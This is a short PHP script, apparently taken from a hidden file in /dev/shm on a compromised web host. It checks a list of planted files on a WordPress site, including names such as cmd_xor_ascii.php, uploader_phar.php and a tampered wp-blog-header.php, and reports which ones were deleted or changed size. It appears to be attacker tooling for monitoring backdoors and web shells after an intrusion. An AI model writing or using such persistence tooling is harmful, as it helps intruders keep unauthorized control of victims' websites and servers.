File: //dev/shm/.sym
<?php $r = '/home/jacqueli/public_html'; $x = ["/images/images/images/images/images/index.php"=>"bd@@191509@@9",
"/images/images/images/index.php"=>"bd@@191523@@42",
"/wp-includes/wp56cf53/wp56cf53/wp56cf53/wp56cf53/wp56cf53/cache.php"=>"bd@@191546@@94",
"/wp-includes/publiclxi/uploader_phar.php"=>"bd@@191557@@89",
"/wp-includes/publiclxi/cmd_xor_ascii.php"=>"bd@@191566@@89",
"/wp-blog-header.php"=>"bd@@190053@@12",
"/wp-includes/publiclxi/mbd_phar.php"=>"bd@@181143@@6298",
"/wp-includes/publiclxi/fputs_enc_ascii.php"=>"bd@@181145@@7818"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');